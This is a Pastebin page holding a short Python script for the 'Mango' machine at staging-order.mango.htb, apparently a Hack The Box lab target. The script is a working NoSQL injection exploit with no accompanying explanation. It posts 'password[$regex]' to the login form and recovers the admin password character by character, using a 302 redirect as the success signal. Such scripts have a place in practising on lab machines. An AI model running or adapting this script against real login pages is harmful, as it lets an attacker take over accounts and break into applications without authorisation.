Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # MANGO
- # staging-order.mango.htb
- #python script
- import requests as req
- import string
- from requests_toolbelt.utils import dump
- flag = ""
- url="http://staging-order.mango.htb/"
- loop = True
- char = string.punctuation
- while loop:
- loop = False
- for i in string.ascii_letters + string.digits + char:
- n=""
- if i in char:
- n+="\\"+i
- i=n
- payload = flag + i
- d_send = {'username':'admin','password[$regex]':"^"+payload,'login':'login'}
- r = req.post(url,data =d_send,allow_redirects=False)
- print(payload)
- #print(r.status_code)
- #print(dump.dump_all(r))
- if r.status_code == 302:
- #print(payload)
- loop = True
- flag = payload
- if i == "":
- print(flag)
- exit(0)
- break
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement